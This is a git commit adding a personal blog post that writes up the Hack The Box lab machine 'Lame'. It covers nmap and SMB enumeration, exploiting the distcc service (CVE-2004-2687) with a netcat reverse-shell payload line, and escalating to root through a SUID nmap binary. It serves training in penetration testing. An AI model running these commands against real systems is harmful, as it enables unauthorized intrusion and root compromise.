NEW: Lame Hack the Box

therokdaba · Jul 26, 2023 · 5cdee4a · 5cdee4a
1 parent 21bd0d8
commit 5cdee4a
Show file tree

Hide file tree

Showing 11 changed files with 72 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -34,6 +34,8 @@
 
 ## HackTheBox Writeups:
 
+- [Lame](https://therokdaba.github.io/2023/07/26/HTB-Lame.html)
+
 - [Archetype](https://therokdaba.github.io/2021/06/05/HTB-Archetype.html)
 
 ## "My Journey Coding a Life Simulator" - Archived February 2021:

diff --git a/_posts/2023-07-26-HTB-Lame.md b/_posts/2023-07-26-HTB-Lame.md
@@ -0,0 +1,70 @@
+# HTB - Lame
+
+I decided to work on TJ Null's list of Hack The Box machines even though I'm not prepping for OSCP because I thought it might be a fun way to practice now that I have HTB VIP. The first machine on the list is Lame, so let's get to it!
+
+## Initial Foothold
+
+The first thing I did was run an initial Nmap scan with the following tags `-sC`, -`sV`, `-vv`, `-Pn` to use the default scripts, enumerate the services in the ports found, enable a verbose output and disable host discovery. I used `-oN` to save the ouput of the command (it's always a good idea to do so). The final command is `nmap -sC -sV 10.10.10.3 -vv -Pn -oN nmap/initial`.
+
+![Initial nmap scan](/images/Lame/nmap_initial.png)
+
+Nmap has found ports 21 (FTP), 22 (SSH), 139 and 445, which are related to smb.
+
+I decided to investigate these further but while doing that, I ran a more aggressive scan on all ports with tags `-A` and `-p-`: `nmap -A -p- -sC -sV 10.10.10.3 -vv -Pn -oN nmap/aggressive`.
+
+The first thing I took a look at was the FTP service where FTP anonymous could be used (login with `anonymous`, no password) however the directory seemed to be completely empty so I quickly moved on to looking at the smb services.
+
+I used `smbmap` to see what I could access: `smbmap -H 10.10.10.3`
+
+![Smbmap](/images/Lame/smbmap.png)
+
+The only share that I could take a look at was `tmp`, so I did so using `smbclient`: `smbclient \\\\10.10.10.3\\tmp`:
+
+![smbclient tmp list](/images/Lame/smbclient_tmp.png)
+
+Taking a look around, there wasn't much that I had access to that looked interesting, except maybe vgauthsvclog.txt.0:
+
+![vgauthsvclog.txt.0](/images/Lame/vgauthsvclog.txt.0.png)
+
+This is linked to the VMware Guest Authentication Service, I thought that this could be used to obtain access on the machine but since it looked like it could be a rabbit hole, I decided to first take a look at the output of my aggressive nmap scan which had the following new service:
+
+```
+3632/tcp open distccd syn-ack distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
+```
+
+A quick google search showed that this service had a CVE on record. I used the following command to check if the service running on the machine is vulnerable to that CVE: `nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 -Pn -oN nmap/vuln`.
+
+![Nmap vulnerability check scan](/images/Lame/nmap_vuln.png)
+
+Since it's vulnerable, I looked for an exploit and found [one in python](https://github.com/galenlim/distcc-exploit-python). The only thing I needed to was change the line containing the payload to my host ip and the port I would be listening to with netcat. `payload = "nc <HOST> 1234 -e /bin/bash"`. I then ran a netcat listener on my attacking machine: `nc -lnvp 1234` and the exploit with `./exploit.py 10.10.10.3 3632` and this got me a shell.
+
+## Privilege escalation
+
+I used this following command to get an interative shell `python -c 'import pty; pty.spawn("/bin/bash")'` and found the user flag in `/home/makis`:
+
+![User flag location](/images/Lame/user_loc.png)
+
+I found 4 main directories in `/home`:
+
+- `ftp` -> empty
+
+- `makis` -> user flag and `.sudo_as_admin_successful` -> so we know it has used sudo before
+
+- `service` -> basically empty
+
+- `user`:
+
+ `.ssh` -> looks interesting but we don't have reading access
+
+At this point, I realised that I could enter `/root` and list its files:
+
+![Files in root directory](/images/Lame/root_ls.png)
+
+A couple things looked interesting but it didn't seem like I had enough access to any of them to do something useful so I decided to look for SUID binaries in the machine with the following command: `find / -perm -u=s -type f 2>/dev/null; find / -perm -4000 -o- -perm -2000 -o- -perm -6000`
+
+![SUID binaries](/images/Lame/suid.png)
+
+`/usr/bin/nmap` jumped out to me and by running `nmap --interactive` and then running `!sh`, I landed a root shell. I was then able to read the `/root/root.txt` which is the final flag:
+
+![Root through namp](/images/Lame/root.png)
+
diff --git a/images/Lame/nmap_initial.png b/images/Lame/nmap_initial.png
diff --git a/images/Lame/nmap_vuln.png b/images/Lame/nmap_vuln.png
diff --git a/images/Lame/root.png b/images/Lame/root.png
diff --git a/images/Lame/root_ls.png b/images/Lame/root_ls.png
diff --git a/images/Lame/smbclient_tmp.png b/images/Lame/smbclient_tmp.png
diff --git a/images/Lame/smbmap.png b/images/Lame/smbmap.png
diff --git a/images/Lame/suid.png b/images/Lame/suid.png
diff --git a/images/Lame/user_loc.png b/images/Lame/user_loc.png
diff --git a/images/Lame/vgauthsvclog.txt.0.png b/images/Lame/vgauthsvclog.txt.0.png